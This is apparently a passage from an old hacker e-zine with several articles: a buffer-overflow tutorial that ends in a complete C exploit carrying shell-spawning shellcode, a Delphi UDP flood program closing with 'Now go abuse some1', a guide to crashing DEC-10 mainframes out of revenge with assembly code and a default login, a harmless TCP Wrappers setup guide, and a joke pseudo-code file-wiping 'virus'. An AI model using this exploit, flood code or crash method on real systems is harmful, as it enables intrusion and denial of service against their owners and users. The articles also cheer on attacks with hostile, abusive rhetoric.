is to use an automated code scanner such as flawfinder, however there are as
many disadvantages as there are advantages
as an automated code scanner only really looks for Dangerous functions, not
poorly coded functions...
http://www.dwheeler.com/flawfinder/
"flawfinder, a program that examines source code and reports possible
security weaknesses (`flaws'') sorted
by risk level. It's very useful for quickly finding and removing at least
some potential security problems before
a program is widely released to the public"
---- example1 -----
#include <stdio.h>
int main(void)
{
char name[5+1]; /* +1 for the null byte */
gets(name);
printf("%s\n", name);
return 0;
}
------ eoc --------
This example shows the function gets() from stdio.h, which does not use
bounds checking. if you compile and run this
program, and enter more than 5 characters it will segmentation fault as it
is trying to overwrite the memory which is
already in use.
If you run this code through flawfinder, it should say something like:
example1.c:6 [5] (buffer) gets:
Does not check for buffer overflows. Use fgets() instead.
Notice it says '[5]' this demonstates the severity of the use of this
funtion. 5 is the most severe rating where as 1
is just a minor bug.
----- example2 -------
#include<stdio.h>
int main(void)
{
char input[10+1]; /* Allow 10 visible chars plus
one null char at last element. */
char *ret_ptr; /* Used to check return of fgets() */
puts("Enter some text:");
ret_ptr = fgets(in, sizeof(in), stdin);
if (ret_ptr != NULL)
printf("You entered: %s", ret_ptr);
else
printf("Error processing fgets()\n");
return 0;
}
---- eoc -----
This example is much more secure, as it has bounds checking, and if the user
enters more than 10 characters it will
display the error "Error Processing fgets()".
System Input / Output to things such as ident or syslog can be dangerous too
without proper checking, as it could end
up with the logs being wiped or ident being changed, or it could just
corrupt the contents.
Buffer overflows:
The concept behind a buffer overflow, is to overwrite parts of the memory
which aren't supposed to be overwritten
by arbitary code, and getting this contents of this memory overwritten.
The processes memory contains 3 sections :
code segment, data in this segment are assembler instructions that
the processor executes. The code execution is non-linear, it can skip
code, jump, and call functions on certain conditions. Therefore, we
have a pointer called EIP, or instruction pointer. The address where
EIP points to always contains the code that will be executed next.
data segment, space for variables and dynamic buffers
stack segment, which is used to pass data (arguments) to functions
and as a space for variables of functions. The bottom (start) of the
stack usually resides at the very end of the virtual memory of a page,
and grows down. The assembler command PUSHL will add to the top of the
stack, and POPL will remove one item from the top of the stack and put
it in a register. For accessing the stack memory directly, there is
the stack pointer ESP that points at the top (lowest memory address)
of the stack.
With that in mind, we'll have a look at a simple vulnerable program, and
then exploit it:
-------example3.c-------------------
int main(int argc, char *argv[])
{
char buffer[500];
if(argc>=2) strcpy(buffer, argv[1]);
return 0;
}
/* If you wish to try and get root by exploiting this code, su, chown 0
example3.c and chmod it 4777 */
-------------eoc---------------
The above code uses strcpy() but it doesn't use sizeof(buffer) to make sure
its under 499 bytes, allowing more
than 500bytes to be entered causing an overflow.
A Simple exploit for the above code would execute example3.c, and then
writes 501+ bytes to it, causing an overflow.
I.e :
-----example4.c--------
void main()
{
char buffer[501];
memset(&buffer, 'a', sizeof(buffer));
execl("./example3", "vulnerable", buffer, 0);
}
-----eoc------------
If you executed the above code it should crash example3, and come back with
an error like "Bus Error" or
"Segmentation Fault".
In this paper I will not cover Shellcode and how to obtain it, I will use
commonly available shellcode that spawns
/bin/shell.
So We have 500 bytes to play with, and somewhere in that we need to insert
our shellcode, and get it executed, and
we will need to know roughly whereabouts in the memory it is in order to be
able to get it executed and gain our
shell.
Straight into the exploit, it may seem a little daunting, because I've only
explained a little of it, but in future
tutorials on exploits and buffer overflows I'll explain better :
---------------Exploit.c-------------------
#include <stdlib.h>
#define BUFFERSIZE 600 /* vulnerable buffer + 100 bytes */
/* shellcode for freebsd (*bsd?) */
char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
/* linux x86 shellcode */
char lunixshell[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";
unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}
void usage(char *cmd)
{
printf("\nusage: %s <offset> <os>\n\n", cmd);
printf("OS types are: 1. FreeBSD (*bsd?) 2. Linux\n\n");
exit(-1);
}
int main(int argc, char *argv[])
{
int i, offset, os;
long esp, ret, *addr_ptr;
char *buffer, *ptr, *osptr;
if(argc<3) usage(argv[0]); /* quit if they didnt specify an offset
*/
offset = atoi(argv[1]); /* get the offset they specified */
esp = sp(); /* get the stack pointer */
ret = esp-offset; /* sp - offset = return address */
os = atoi(argv[2]); /* get os */
if(os<1 || os>2) usage(argv[0]);
printf("Stack pointer: 0x%x\n", esp);
printf(" Offset: 0x%x\n", offset);
printf(" Return addr: 0x%x\n", ret);
/* allocate memory for our buffer */
if(!(buffer = malloc(BUFFERSIZE))) {
printf("Couldn't allocate memory.\n");
exit(-1);
}
/* fill buffer with ret addr's */
ptr = buffer;
addr_ptr = (long *)ptr;
for(i=0; i<BUFFERSIZE; i+=4)
*(addr_ptr++) = ret;
/* fill first half of buffer with NOPs */
for(i=0; i<BUFFERSIZE/2; i++)
buffer[i] = '\x90';
/* insert shellcode in the middle */
if(os == 1) {
ptr = buffer + ((BUFFERSIZE/2) - (strlen(bsdshell)/2));
for(i=0; i<strlen(bsdshell); i++)
*(ptr++) = bsdshell[i];
} else {
ptr = buffer + ((BUFFERSIZE/2) - (strlen(lunixshell)/2));
for(i=0; i<strlen(lunixshell); i++)
*(ptr++) = lunixshell[i];
}
/* call the vulnerable program passing our exploit buffer as the
argument */
buffer[BUFFERSIZE-1] = 0;
execl("./example3", "vulnerable", buffer, 0);
return 0;
}
----------EOC-------------
I'm sorry about the length of the exploit, but the shellcode has to be
different for FreeBSD, but I'm
Not sure wether it will work under different flavours of *bsd, Other than
that it is pretty explanitory
and this exploit could easily be adapted to exploit different holes.
There isn't really one specific technique for finding holes, and with the
development of tools such as rats
and flawfinder there ins't really need to audit code manually, unless you
wish to find sloppy code, which
these automated scanners do not look for yet.
There are lots of automated scanners available :
http://www.striker.ottawa.on.ca/~aland/pscan/
http://www.cs.berkeley.edu/~jfoster/cqual/
http://splint.org/
http://www.cs.berkeley.edu/~daw/mops/
http://www.cs.berkeley.edu/~daw/boon/
http://www-cad.eecs.berkeley.edu/~rupak/blast/
http://lclint.cs.virginia.edu/
http://www.cigital.com/its4/
http://smatch.sourceforge.net/
http://metacomp.stanford.edu/
A good and more thorough guide for more secure C programming -
http://www.dwheeler.com/secure-programs/
---------------
mov_21h[at]shellcoders[dot]com
http://vader.digitalparadox.org
Credits :
overflow.txt by Fides / mimayin of l2k
Mixter's Paper on secure programming
buffero.txt by l0pht
===========================================================
>-- DoS Program Written in Some Shitty Language
--< Sniff
<the_sniff> DUDE I ONLY DDOS WHEN I HAVE NO OTHER WAY OF LETTING MY ANGER OFF
<The_SNiFF> u didn't delete the qoute
<The_SNiFF> quote
<The_SNiFF> and delete the FAKE quote
Intoduction
~~~~~~~~~~
In a UDP attack we send data to a closed port
makeing the victim responds to us with an ICMP msg "port unreachable" (or smth)
thus killing it upstream :o
If u won't use a strong enough attack machine, ur machine will get packet storm
ed too since this is non spoofed :p
--BOF--
//DDDoS
//TO Use this call TSocketThread.Create with all vars to create a DoS Thread (a
SINGLE one :xi~:@)
unit DoSThread;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ScktComp, StdCtrls, ComCtrls, Winsock;
type
{ The Thread Class interface }
TSocketThread = class(TThread)
private
{ .. }
protected
procedure Execute; override;
public
constructor Create(Host, Port: String; Packs, Times:
Integer);
destructor Destroy; override;
end;
var
giBegin, giTime: Integer;
pMethod, sHost, sPort: String;
implementation
{ TSocketThread }
constructor TSocketThread.Create(Host, Port: String; Packs,
Times: Integer);
begin
{ When Created pass the vars inside the thread as global vars }
inherited Create(False);
FreeOnTerminate := True;
//time when thread started, use GetTickCount()
giBegin:=iBegin;
//Time to run in seconds
giTime:=iTime;
//Victim Host and Port
sHost:=Host;
sPort:=Port;
end;
destructor TSocketThread.Destroy;
begin
{ Part of the Class }
inherited;
end;
procedure TSocketThread.Execute;
var
I, sh: Integer;
Buf: String;
InAddr: sockaddr_in;
GInitData: TWSAData;
begin
I:=GetTickCount();
WSAStartup($101, GInitData);
while (((I-iBegin)/1000) <= iTime) or (iTime=0) do
begin
Buf:='Attracking!! (with RedAlert Russian Accent)';
Randomize;
InAddr.sin_family := AF_INET;
InAddr.sin_addr.s_addr := inet_addr( PChar(sHost) );
InAddr.sin_port := htons( Random(65534)+1 ); //Random Port, use sPort if
u want a constant one
sh:=socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
SendTo(sh, Buf[1], Length(Buf), 0, InAddr, SizeOf(InAddr));
CloseSocket(sh);
I:=GetTickCount;
end;
WSACleanup;
end;
end.
--EOF--
This is a simple udp DDoS with no spoofing written in Delphi.
Now go abuse some1. And remember kiddies, fame only comes when the FBI knock at
ur door!
P.S. If this code has any errors, well, fuq u :~@
===========================================================
>-- Crashing DEC-10's
--< The Mentor [ written straight from the nursing home! ]
Occasionally there will be a time when destruction is necessary.
Whether it is revenge against a tyrannical system operator or
against
a particular company, sometimes it is desirable to strike at the heart of a
company...their computer.
What follows is a fairly detailed explanation of how to go about
crashing a DEC-10 computer running any operating system. The user will have
to be able to create and execute assembly level and high level language
files, as well as having a good working knowledge of programming.
The first step is to obtain an account. Whether this be a default
account like 5,30 (pw: GAMES) or an account that you hacked by some other
method, you have to be able to access the system. Superuser access is not
necessary, however, for this method to work.
At the heart of every mainframe computer is the central processing
unit. The CPU handles all instructions, fetching them from memory, decoding
them, and executing them. A DEC has what is called a DMA (Direct Memory
Access) Controller that functions as a small CPU handling all the input and
output from memory and peripherals, freeing the main CPU to execute instruc-
tions. We take advantage of this fact in crashing the system.
Theory: The CPU depends on the DMA Controller to handle all memory
access. If the DMA can be crashed, the CPU grinds to a halt and the sysop
has to run DSK:RAT to restore all the files on the system (a one hour
process,
deadly at peak operating time.) We cause the DMA to crash by slowing it
down
incredibly and overflowing the system stack.
Practice-
There exists an area known as 'Job Data Area' at octal 20 through
140
of the user's memory. This stores all relevant information about the
current
task executing. The individual locations each have a 6-bit mnemonic
starting
with .JB in each case. These must be introduced into a symbol table as ext-
ernal references.
The highest core address available to the user is stored at .JBREL
in the Job Data Area. If you try to access more core than you are allowed,
you will get an interrupt and it will crash. The first step is to disable
the interrupt. This is done by setting bit 22 in the AC to 1. This is done
with a mask as follows...
APRENB AC
MOVEI AC,20000 (octal)
The interrupt is now shut out. Next, you must start snatching up
all
available system core. This cannot be done by directly meddling with
.JBREL.
Instead, you must alter AC (accumulator) to contain the highest desired
address and then move it into .JBREL. This can be done with the following
subroutine.
CORE AC,
TOP: MOVE AC,.JBREL##
AOJA AC,.+1
CORE AC,
BRA TOP
At first, incrementing only by one looks like a slow way to grab
core,
but since it is only allocated in chunks of either 1K or 2K words, you can
quickly suck up a lot of memory. (Following this file is a complete sample
program in MACRO-10 showing how to increase the core to a certain limit.)
Now that we have all the core we can get, the system is already more
than likely slowing down. This is good. Now we put in the fatal blow.
You should already have prepared a program that relies heavily on recursion.
The choice languages for this are either C or Pascal. Simply set up a
simple
recursive program (Towers of Hanoi with 100 rings, for instance), and tell
it
to execute.
What will begin to happen is that the DMA stack will start filling
up,
slowing the system down even further. Eventually, after between 5 minutes
and
15 minutes (longest it's ever taken me), you get the nice beep and...
;;OPSER- DEC SYSTEM-10 NOT RUNNING
I've only had to do this on three systems that the sysop really
pissed me off (not counting the system where I go to school, on which I do
it all the time when I'm bored...) It's kind of an extreme measure, but
it can be an effective one.
The following program is a sample for those not familiar with
MACRO-10
assembly language.
32
START: TITLE SAMPLE
MOVE P,[IOWD 3,MEM]
MOVE [PUSHJ P,PDLOV]
MOVEM .JBAPR##
MOVEI AC,600000
APRENB AC,
SETZB CT
MOVEM AC
AOS
PUSHJ P,S1
JRST .-3
S1: IDIVI AC,10
HRLM N,(P)
JUMPE AC,.+3
PUSHJ P,S1
SKIPA
PUSHJ P,S2
HLRZ N,(P)
ADDI N,60
OUTCHR N
POPJ P,
S2: SOJG CT,.+4
OUTCHR [15]
OUTCHR [12]
MOVEI CT,10
MOVE T,P
OUTCHR [40]
AOBJN T,.-1
POPJ P,
PDLOV: PUSHJ P,LIMIT
SUB P,[1,,0]
JRSTF @.JBTPC##
LIMIT: CAIL 1000 ;CHANGE TO WHATEVER YOU WANT!
EXIT
POPJ P,
MEM: BLOCK 10
END START
=============================================================
>-- An Introduction to TCP Wrappers
--< lothos of LoU (ph34r 7h3 1337n3zz HACK THE PLANET!!)
The TCP Wrappers program, from Wietse Venema, is an easy to use
utility for host and network based access control that does logging for
services started by inetd(8). TCP Wrappers will allow you to finger
people who connect to you, display a banner for incoming telnet
connections, or run an ambiguous command, and will also prevent some
spoofing attacks by making sure the IP address and hostname match.
_Getting TCP Wrappers_
TCP Wrappers is shipped with many flavors of unix, including
BSD/OS, OpenBSD, and possibly other *BSD flavors. It comes standard with
Linux, but is rarely configured correctly.
You can get tcp_wrappers from
ftp://ftp.win.tue.nl/pub/security/tcp_wrappers_7.6.tar.gz, or from
ftp://coast.cs.purdue.edu/pub/tools/tcp_wrappers. Version 7.6 is
the latest as of this writing.
_Installing TCP Wrappers_
The advanced way to install tcp_wrappers, as instructed in the
readme, is actually easier, so I will describe that way to install.
1. Copy the current /etc/inetd.conf to another location as a back up, such
as /etc/inetd.conf.dist.
2. Edit tcpwrapper's Makefile to show where the real daemon's are located.
Under OpenBSD I would uncomment REAL_DAEMON_DIR=/usr/libexec.
3. If you want the language extension enabled, uncomment the following
line:
#STYLE = -DPROCESS_OPTIONS # Enable language extensions.
I recommend uncommenting this line, which makes access control easier by
allowing you to specify access control in one file, instead of two, and
also allows you to use the extra features, including banners and commands.
4. Next, compile tcpwrappers. If you simply type 'make' it will output an
error message. You must specify the system type you have, as specified by
the error message.
_Configuring /etc/inetd.conf_
You must edit your inetd.conf file in order to use tcpwrappers.
Change it to specify the location of tcpd.
telnet stream tcp nowait root /usr/libexec/telnetd telnetd
should be changed to:
telnet stream tcp nowait root /usr/libexec/tcpd telnetd
or the location of your tcpd daemon. A 'kill -HUP inetd' will update
these changes.
_Access Control_
Access is controlled by two files, /etc/hosts.allow and
/etc/hosts.deny. If you followed my instructions above, you will only
need the /etc/hosts.allow file.
The format of this file is:
daemons : client_host_list : option : option
A simple example to demonstrate this:
fingerd : local.machine.com : ALLOW
NOTE: You should use ip addresses for increased security.
TCP Wrappers should log to MAIL.INFO by default, but this can be
changed
in the Makefile. I have also set up my /etc/syslog.conf file so that the
logs
go to both a f
ile and to /dev/ttyC7 so I can read them in real time.
_Advanced Options_
Banners
Banners display a message to someone connecting to your machine.
You
need to set up a directory for them, I have mine set up in /etc/Banners.
Using banners, you can have separate banners for allowed hosts and denied
hosts by using two directories (/etc/Banners/allowed/, for example)
An example of a banner:
Trying 192.168.0.0...
Connected to 192.168.0.0.
Escape character is '^]'.
WARNING:
This computer system is for authorized users only. Any unauthorized
access will be logged and prosecuted.
You have been logged as: root@phear.com
OpenBSD/i386 (phear) (ttyp5)
login:
You can make your banners as simple or complex as you'd like. %c
will
return username@hostname info, assuming the other computer has identd
running. Some expansions that can be used are:
Token Mnemonic Expands to:
%a address ip address of client.
%c client info username@hostname
%s server info daemon@host.
There are many more options, these are the ones I use the most frequently.
A denied host will display:
Trying 192.168.0.0...
Connected to 192.168.0.0.
Escape character is '^]'.
Connection closed by foreign host.
You can also optionally specify a banner to display for deny as well
by
specifying a banner to use, to provide more information to the user about
why the access is denied.
If you want to allow fingerd from local hosts, and want external
hosts
to be denied with a message, you would configure /etc/hosts.allow like so:
fingerd : LOCAL : allow
fingerd : all : twist /path/to/message
The twist option will run a specified shell command.
You can also specify that tcpd finger anyone attempting to connect
to
your machine. We do not finger any finger connections, to prevent a
continuous loop where the remote machine also fingers connections.
all EXCEPT fingerd : bad.com : (/usr/local/bin/safe_finger -l @%h | \
/bin/mailx -s %d-%h security@phear.com) &
You can split a command over two or more lines by using the
backslash
character. safe_finger is used because it filters out any nasty control
characters. This command will mail the results of finger @bad.com to the
user of your choice.
_Checking Access Control Settings_
Besides coming with safe_finger, tcpwrappers also comes with two
utilities that check your access control. From tcpdchk(8): tcpdchk examines
your tcp wrapper configuration and reports all potential and real problems
it can find.
tcpdmatch will find a match in the access tables and tell you if
it's allowed or denied, as well as displaying any banners you may have.
This is a great way to see if your access files are thorough enough.
_Limitations of tcpwrappers_
TCP Wrappers is vulnerable to IP spoofing because it uses IP
addresses
for host authentication. It will only provide authentication for daemons
started by inetd(8), and only provides limited support for UDP services.
There is a patch that allows tcpwrappers to be used with sendmail 8.8.8,
but IMHO the wrapper that comes with TIS Firewall Tool Kit is much better.
www.tis.com for more info.
_Sources and More Info_
Read the man pages for more info: tcpd(8), tcpdchk(8),
tcpdmatch(8), hosts_access(5), and hosts_options(5). There is also
information about tcpwrappers in Practical Unix and Internet Security by
Simson Garfinkel and Gene Spafford.
Shoutouts: Legions of the Underground, Tara, Stratus, MostHateD, [gH],
noderatz.
=============================================================
>-- My Virus
--< Lozcar
title: VB.wipe.all
author: lozcar
audience: all you french wannabiz k0d3rz who want a rapide intro
to the amazing world of virologie
level: tres much advanced and shit
OS: windows (best choice: RG edition (Really Good edition))
tools: computer (any with a display adapter would be fine)
VB6 sp3 and >
other: attitude, will and lots of coffe
********************************************************************
First things first: disk-lamer
'Neither L'elephant nor cdej will be responsible for any misuse
of the material included in this short tutorial. If by chance
you manage to compile the code and run it on your computer,
don't email us for complaints.'
we warned you.
*********************************************************************
well, the program is an updated version of that famous virus
who deletes everything from your computer. tweaked and shit.
I also wrote it to proove to those asm/C socialist freaks that
VB is *NOT* english!K.THX
**********************************************************************
Dim computer as personal.computer(machine)
Dim numfiles as number of files on the computer
Private Sub killme_Click()
select all.personal.computer(files)
End Sub
Private Sub wipe_all_h0h0h0()
On Error Please Resume Next
If numfiles is lets.say(100) then go to function too_much_files and wait
Popup a message box on.the.screen ("j00 are about t0 d13!!!!!!!K.THX")
Else
ask.the.user.to("click yes to wipe out all your files")
End If
break
dont.forget.to.thank.the.user ("Thank you :D")
Call function your_dead_m0f0 which.is(next one below)
End Sub
Private Sub your_dead_kthx()
On Error Goto Hell
deletefiles(all files on computer)
set warning (no warning ofcourse duh)
End Sub
=============================================================
NEXT ISSUE:
CDEJ is like a box of cereal. Shift through all the
bland, tasteless crap, and somewhere you'll find a
treasure. A 'prize' as I used to call it (and that's a real
good name considering the pain you'd have to go through
eating the stuff). Coming up in CDEJ #3 may or may not be
one or more of the following 'prizes':
- mystery ascii.... :D? what could it be :D?
- irc logs (come to #cdej and strut yer stuff!)
- a rant on how whitehats are bad and how us
13-22 year olds are gonna change the face of
the internet community forever or something
HAQ THE PLANET!!@#$
:=o <(Ubuntu! The Linux of African heardsmen. I demand forign aid!)
EOF!
